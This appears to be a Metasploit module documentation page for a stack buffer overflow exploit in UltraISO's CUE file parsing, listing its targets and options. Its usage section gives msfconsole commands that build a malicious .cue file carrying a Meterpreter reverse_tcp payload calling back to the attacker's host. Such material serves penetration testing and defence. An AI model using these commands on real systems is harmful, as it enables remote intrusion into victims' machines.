UltraISO CUE File Parsing Buffer Overflow

This module exploits a stack-based buffer overflow in EZB Systems, Inc's UltraISO. When processing .CUE files, data is read from file into a fixed-size stack buffer. Since no bounds checking is done, a buffer overflow can occur. Attackers can execute arbitrary code by convincing their victim to open an CUE file. NOTE: A file with the same base name, but the extension of "bin" must also exist. Opening either file will trigger the vulnerability, but the files must both exist.

Search Other Modules

Exploit Rank

Great

Exploit Authors

n00b < >
jduck < jduck [at] metasploit.com >

Vulnerability References

Exploit Targets

0 - Windows - UltraISO v8.6.2.2011 portable (default)
1 - Windows - UltraISO v8.6.0.1936

Exploit Development

Similar Exploit Modules

Exploit Usage Information

$ msfconsole

                ##                          ###           ##    ##
##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/windows/fileformat/ultraiso_cue
msf exploit(ultraiso_cue) > show payloads
msf exploit(ultraiso_cue) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ultraiso_cue) > set LHOST [MY IP ADDRESS]
msf exploit(ultraiso_cue) > exploit

Exploit Module Options

FILENAME	The file name. (default: msf.cue)
ContextInformationFile	The information file that contains context information
DisablePayloadHandler	Disable the handler code for the selected payload
EnableContextEncoding	Use transient context when encoding payloads
VERBOSE	Enable detailed status messages
WORKSPACE	Specify the workspace for this module
WfsDelay	Additional delay when waiting for a session